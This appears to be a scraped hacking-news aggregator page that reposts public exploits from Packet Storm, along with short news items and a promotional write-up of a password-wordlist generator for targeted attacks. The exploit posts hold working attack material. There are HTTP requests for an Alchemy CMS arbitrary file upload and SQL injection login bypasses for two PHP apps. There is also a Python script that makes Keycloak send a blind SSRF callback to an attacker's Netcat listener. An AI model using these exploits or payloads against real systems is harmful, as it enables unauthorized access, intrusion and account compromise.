Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Alchemy CMS 6.0.0 Arbitrary File Upload
https://2.bp.blogspot.com/-7dI_F0yeiSk/WWlvAqxVj9I/AAAAAAAAIKQ/m4aOGdGGTmo7o3qANzxUijwjE_G1NHOSQCLcBGAs/s1600/h123.png
Alchemy CMS versions 2.x through 6.0.0 suffers from an arbitrary file upload vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Alchemy CMS 6.0.0 Arbitrary File Upload
https://2.bp.blogspot.com/-7dI_F0yeiSk/WWlvAqxVj9I/AAAAAAAAIKQ/m4aOGdGGTmo7o3qANzxUijwjE_G1NHOSQCLcBGAs/s1600/h123.png
Alchemy CMS versions 2.x through 6.0.0 suffers from an arbitrary file upload vulnerability.
MD5 |
772227ba1ea679c5bb90f672fd31df27Download
# Exploit Title: AlchemyCMS 2.x to 6.0.0 - Unrestricted File Upload (authenticated)
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://alchemy-cms.com
# Software Link: https://github.com/AlchemyCMS/alchemy_cms
# Version: from 2.0 to 6.0.0
# Tested on: Linux ruby 2.6.8p205 rails 6
in /app/models/alchemy/attachment.rb line 82 :
def allowed_filetypes
Config.get(:uploader).fetch("allowed_filetypes", {}).fetch("alchemy/attachments", [])
end
end
in /app/views/alchemy/admin/uploader/_button.html.erb in 18
configuration(:uploader)['allowed_filetypes'][object.class.model_name.collection] || ['*'] %>
POC :
POST /admin/attachments HTTP/1.1
------WebKitFormBoundarydAup7dA7ub3Weccp
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
Content-Type: application/octet-stream
anything
------WebKitFormBoundarydAup7dA7ub3Weccp--
OR
id = 8 for old attachment
PATCH /admin/attachments/8 HTTP/1.1
------WebKitFormBoundarylYnqNR9sxMPdw7Si
Content-Disposition: form-data; name="_method"
patch
------WebKitFormBoundarylYnqNR9sxMPdw7Si
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
Content-Type: application/octet-stream
anything
------WebKitFormBoundarylYnqNR9sxMPdw7Si--
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Alchemy CMS 6.0.0 Arbitrary File Upload
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
myfactory.FMS 7.1-911 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
myfactory.FMS 7.1-911 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
myfactory.FMS 7.1-911 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Sonicwall SonicOS 7.0 Host Header Injection
___________________________
@hacking_Attack
@Hacking_Video
Sonicwall SonicOS 7.0 Host Header Injection
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Sonicwall SonicOS 7.0 Host Header Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Lifestyle Store 1.0 Cross Site Scripting
https://1.bp.blogspot.com/-vtYXiq7PjFk/WWlvT3pSItI/AAAAAAAAIN4/S7SZq03xxCsAAYdYEaQwiY4Z64tRJ_WvQCLcBGAs/s1600/h43.png
Lifestyle Store version 1.0 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Lifestyle Store 1.0 Cross Site Scripting
https://1.bp.blogspot.com/-vtYXiq7PjFk/WWlvT3pSItI/AAAAAAAAIN4/S7SZq03xxCsAAYdYEaQwiY4Z64tRJ_WvQCLcBGAs/s1600/h43.png
Lifestyle Store version 1.0 suffers from a cross site scripting vulnerability.
MD5 |
d7c8253fafc2f8b1b505290bc4013a98Download
Lifestyle Store 1.0 Cross Site Scripting
# Exploit Title: Lifestyle Store (Online Shop Store) 1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2021-10-12
# Author: Thamer https://twitter.com/thamer9900
# Software Link: https://download-media.code-projects.org/2021/07/Online_Shop_Store_In_PHP_With_Source_Code.zip
# Version: 1.0.0
# Tested on: Windows 10
1. Description:
The tab parameter in the signup.php is vulnerable to XSS.
2. signup.php in line 62 code:
if(isset($_GET["m2"])){
echo $_GET['m2'];
}
3. Proof of Concept:
/online-shop/signup.php?error=
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Lifestyle Store 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Logitech Media Server 8.2.0 Cross Site Scripting
https://3.bp.blogspot.com/-DuI_c3FaBwQ/WWlvaHZ97uI/AAAAAAAAIO8/N3071iSnuSkvxUt6NQQ_hoJeYx39DTurQCLcBGAs/s1600/h61.png
Logitech Media Server version 8.2.0 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Logitech Media Server 8.2.0 Cross Site Scripting
https://3.bp.blogspot.com/-DuI_c3FaBwQ/WWlvaHZ97uI/AAAAAAAAIO8/N3071iSnuSkvxUt6NQQ_hoJeYx39DTurQCLcBGAs/s1600/h61.png
Logitech Media Server version 8.2.0 suffers from a cross site scripting vulnerability.
MD5 |
3ae9922542573279c3faa0e7e86540cdDownload
# Exploit Title: Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)
# Shodan Dork: Search Logitech Media Server
# Date: 12.10.2021
# Exploit Author: Mert Das
# Vendor Homepage: www.logitech.com
# Version: 8.2.0
# Tested on: Windows 10, Linux
POC:
1. Go to Settings / Interface tab
2. Add payload to Title section
3. Payload : ">1
4. Alert will popup
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Logitech Media Server 8.2.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Simple Payroll System 1.0 SQL Injection
https://4.bp.blogspot.com/-sHG2jViTb-c/WWlvSCf2XfI/AAAAAAAAINY/YxfxwjOK_o05QB9TpuqqysTdHaIb3yf8wCLcBGAs/s1600/h36.png
Simple Payroll System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Simple Payroll System 1.0 SQL Injection
https://4.bp.blogspot.com/-sHG2jViTb-c/WWlvSCf2XfI/AAAAAAAAINY/YxfxwjOK_o05QB9TpuqqysTdHaIb3yf8wCLcBGAs/s1600/h36.png
Simple Payroll System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
216367c07b58ea8e258e33f401324cedDownload
# Exploit Title: Simple Payroll System 1.0 - SQLi Authentication Bypass
# Date: 2021-10-09
# Exploit Author: Yash Mahajan
# Vendor Homepage: https://www.sourcecodester.com/php/14974/simple-payroll-system-dynamic-tax-bracket-php-using-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple_payroll_0.zip
# Version: 1.0
# Tested on: Windows 10
# Description: Simple Payroll System v1.0 Login page can be bypassed with a SQLi into the username parameter.
Steps To Reproduce:
1 - Navigate to http://localhost/simple_payroll/admin/login.php
2 - Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field.
3 - Click on "Login" button and you are logged in as administrator.
Proof Of Concept:
POST /simple_payroll/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 37
Origin: http://localhost
Connection: close
Referer: http://localhost/simple_payroll/admin/login.php
Cookie: PHPSESSID=ijad04l4pfb2oec6u2vmi4ll9p
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
username='+or+1%3D1--+&password=admin
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Simple Payroll System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Keycloak 12.0.1 Server-Side Request Forgery
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
Keycloak version 12.0.1 suffers from a blind server-side request forgery vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Keycloak 12.0.1 Server-Side Request Forgery
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
Keycloak version 12.0.1 suffers from a blind server-side request forgery vulnerability.
MD5 |
46b6bc8313add709c2ac9feb8b16a65dDownload
# Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
# Date: 2021-10-13
# Exploit Author: Mayank Deshmukh
# Author Twitter: ColdFusionX_
# Vendor Homepage: https://www.keycloak.org/
# Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html
# Version: versions < 12.0.2
# Tested on: Kali Linux
# CVE : CVE-2020-10770
#!/usr/bin/env python3
import argparse, textwrap
import requests
import sys
parser = argparse.ArgumentParser(description="-=[Keycloak Blind SSRF test by ColdFusionX]=-", formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
./exploit.py -u http://127.0.0.1:8080
[^] Input Netcat host:port -> 192.168.0.1:4444
'''))
parser.add_argument("-u","--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)")
args = parser.parse_args()
if len(sys.argv) <=
print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")
sys.exit()
# Variables
Host = args.url
r = requests.session()
def ssrf():
headerscontent = {
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
}
hook = input("[^] Input Netcat host:port -> ")
_req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{hook}', headers = headerscontent)
return True
if __name__ == "__main__":
print ('\n[+] Keycloak Bind SSRF test by ColdFusionX \n ')
try:
if ssrf() == True:
print ('\n[+] BINGO! Check Netcat listener for HTTP callback :) \n ')
except Exception as ex:
print('\n[-] Invalid URL or Target not Vulnerable')
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Keycloak 12.0.1 Server-Side Request Forgery
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Simple Issue Tracker System 1.0 SQL Injection
https://3.bp.blogspot.com/-Gb5I5b_xjQ0/WWlu86s-SoI/AAAAAAAAIJk/Vrr0JqyMe7wOp_97KyfJoVRHnDW4ZjPNwCLcBGAs/s1600/h112.png
Simple Issue Tracker System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Simple Issue Tracker System 1.0 SQL Injection
https://3.bp.blogspot.com/-Gb5I5b_xjQ0/WWlu86s-SoI/AAAAAAAAIJk/Vrr0JqyMe7wOp_97KyfJoVRHnDW4ZjPNwCLcBGAs/s1600/h112.png
Simple Issue Tracker System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
9ca937bb43f720def1537a3345212cf1Download
# Exploit Title: Simple Issue Tracker System 1.0 - SQLi Authentication Bypass
# Date: 11.10.2021
# Exploit Author: Bekir Bugra TURKOGLU
# Vendor Homepage: https://www.sourcecodester.com/php/14938/simple-issue-tracker-system-project-using-php-and-sqlite-free-download.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14938&title=Simple+Issue+Tracker+System+Project+using+PHP+and+SQLite+Source+Code+Free+Download
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
Steps To Reproduce:
1 - Go to the login page http://localhost/issue_tracker/login.php
2 - Enter the payload to username field as "admin" or " ' OR 1 -- - " and enter any character in the password field.
3 - Click on "Login" button and successful login.
PoC
POST /issue_tracker/Actions.php?a=login HTTP/1.1
Host: 192.168.0.111
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 31
Origin: http://localhost
Connection: close
Referer: http://localhost/issue_tracker/login.php
Cookie: PHPSESSID=71bod5tipklk329lpsoqkvfcb9
username='+OR+1+--+-&password=1
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Simple Issue Tracker System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Dark Reading: Attacks/Breaches
Corelight Unveils Corelight Labs, a Hub for Research and Innovation
Company expands its research expertise with addition of AI and security operations experts from its PatternEx acquisition to the Labs team.
___________________________
@hacking_Attack
@Hacking_Video
Corelight Unveils Corelight Labs, a Hub for Research and Innovation
Company expands its research expertise with addition of AI and security operations experts from its PatternEx acquisition to the Labs team.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Corelight Unveils Corelight Labs, a Hub for Research and Innovation
Company expands its research expertise with addition of AI and security operations experts from its PatternEx acquisition to the Labs team.
IDOR + Account Takeover leads to PII leakage
Hi Fellow Hackers & Security Enthusiasts, Today I am going to write how due to IDOR and I was able to do Password Reset of any user and…Continue reading on Medium »
Read more...
Hi Fellow Hackers & Security Enthusiasts, Today I am going to write how due to IDOR and I was able to do Password Reset of any user and…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Bopscrk : Tool To Generate Smart And Powerful Wordlists
bopscrk (Before Outset PaSsword CRacKing) is a tool to generate smart and powerful wordlists for targeted attacks.
* Targeted-attack wordlist creator: introduce personal info related to target, combines every word and transforms results into possible passwords. The lyricpass module allows to search lyrics related to artists and include them to the wordlists.
* Customizable case and leet transforms: create custom charsets and transforms patterns trough a simple config file.
* Wordlists exclusion: Exclude words from another wordlist (to avoid passwords that you have already tested).
* Interactive mode and one-line command interface supported.
Requirements
* Python 3 (secondary branch keeps Python 2.7 legacy support)
* optional – to use
-h, –help show this help message and exit
-i, –interactive interactive mode, the script will ask you about target
-w words to combine comma-separated (non-interactive mode)
–min min length for the words to generate (default: 4)
–max max length for the words to generate (default: 32)
-c, –case enable case transformations
-l, –leet enable leet transformations
-n max amount of words to combine each time (default: 2)
-a , –artists artists to search song lyrics (comma-separated)
-x , –exclude exclude all the words included in other wordlists
(several wordlists should be comma-separated)
-o , –output output file to save the wordlist (default: tmp.txt)
-C , –config specify config file to use (default: ./bopscrk.cfg)
How it works
* You have to provide some words which will act as a base.
* The lyricpass feature allows to introduce artists. The tool will download all his songs’ lyrics and each line will be added as a new word. By default, artist names and a word formed by the initial of word on each phrase, will be added too.
* The tool will generate all possible combinations between them.
* To generate more combinations, it will add some common separators (e.g. “-“, “_”, “.”), numbers and special chars frequently used in passwords.
* You can use leet and case transforms to increase your chances.
* You can provide wordlists that you have already tested against the target in order to exclude all this words from the resultant wordlist (
* Fields can be left empty.
* You can use accentuation in your words.
* In the others field you can write several words comma-separated. Example: 2C,Flipper.
* If you want to produce all possible leet transformations, enable the recursive_leet option in configuration file.
* You can select which transforms to apply on lyrics phrases found trough the cfg file.
* Using the non-interactive mode, you should provide years in the long and short way (1970,70) to get the same result than the interactive mode.
* You have to be careful with -n argument. If you set a big value, it could result in too huge wordlists. I recommend values between 2 and 5.
* To provide several artist names through command line you should provides it comma-separated. Example:
This feature is based in a modified version of a tool developed originally by init string. The changes are made to integrate input and output’s tool with bopscrk.
It will retrieve all lyrics from all songs which belongs to artists that you provide. By default it will store each artist, each phrase found with space substitution, each phrase found reduced to its initials (which will be transformed later if you have activated leet and case transforms). Advanced Usage Customizing behaviour using .cfg file
* In
___________________________
@hacking_Attack
@Hacking_Video
Bopscrk : Tool To Generate Smart And Powerful Wordlists
bopscrk (Before Outset PaSsword CRacKing) is a tool to generate smart and powerful wordlists for targeted attacks.
* Targeted-attack wordlist creator: introduce personal info related to target, combines every word and transforms results into possible passwords. The lyricpass module allows to search lyrics related to artists and include them to the wordlists.
* Customizable case and leet transforms: create custom charsets and transforms patterns trough a simple config file.
* Wordlists exclusion: Exclude words from another wordlist (to avoid passwords that you have already tested).
* Interactive mode and one-line command interface supported.
Requirements
* Python 3 (secondary branch keeps Python 2.7 legacy support)
* optional – to use
lyricpassmodule: pip install requirements.txtUsage-h, –help show this help message and exit
-i, –interactive interactive mode, the script will ask you about target
-w words to combine comma-separated (non-interactive mode)
–min min length for the words to generate (default: 4)
–max max length for the words to generate (default: 32)
-c, –case enable case transformations
-l, –leet enable leet transformations
-n max amount of words to combine each time (default: 2)
-a , –artists artists to search song lyrics (comma-separated)
-x , –exclude exclude all the words included in other wordlists
(several wordlists should be comma-separated)
-o , –output output file to save the wordlist (default: tmp.txt)
-C , –config specify config file to use (default: ./bopscrk.cfg)
How it works
* You have to provide some words which will act as a base.
* The lyricpass feature allows to introduce artists. The tool will download all his songs’ lyrics and each line will be added as a new word. By default, artist names and a word formed by the initial of word on each phrase, will be added too.
* The tool will generate all possible combinations between them.
* To generate more combinations, it will add some common separators (e.g. “-“, “_”, “.”), numbers and special chars frequently used in passwords.
* You can use leet and case transforms to increase your chances.
* You can provide wordlists that you have already tested against the target in order to exclude all this words from the resultant wordlist (
-x). Tips* Fields can be left empty.
* You can use accentuation in your words.
* In the others field you can write several words comma-separated. Example: 2C,Flipper.
* If you want to produce all possible leet transformations, enable the recursive_leet option in configuration file.
* You can select which transforms to apply on lyrics phrases found trough the cfg file.
* Using the non-interactive mode, you should provide years in the long and short way (1970,70) to get the same result than the interactive mode.
* You have to be careful with -n argument. If you set a big value, it could result in too huge wordlists. I recommend values between 2 and 5.
* To provide several artist names through command line you should provides it comma-separated. Example:
-a johndoe,johnsmith* To provide artist names with spaces through command line you should provides it quotes-enclosed. Example: -a "john doe,john smith"LyricpassThis feature is based in a modified version of a tool developed originally by init string. The changes are made to integrate input and output’s tool with bopscrk.
It will retrieve all lyrics from all songs which belongs to artists that you provide. By default it will store each artist, each phrase found with space substitution, each phrase found reduced to its initials (which will be transformed later if you have activated leet and case transforms). Advanced Usage Customizing behaviour using .cfg file
* In
bopscrk.cfgfile you can specify[...]___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Bopscrk : Tool To Generate Smart And Powerful Wordlists
bopscrk (Before Outset PaSsword CRacKing) is a tool to generate smart and powerful wordlists for targeted attacks.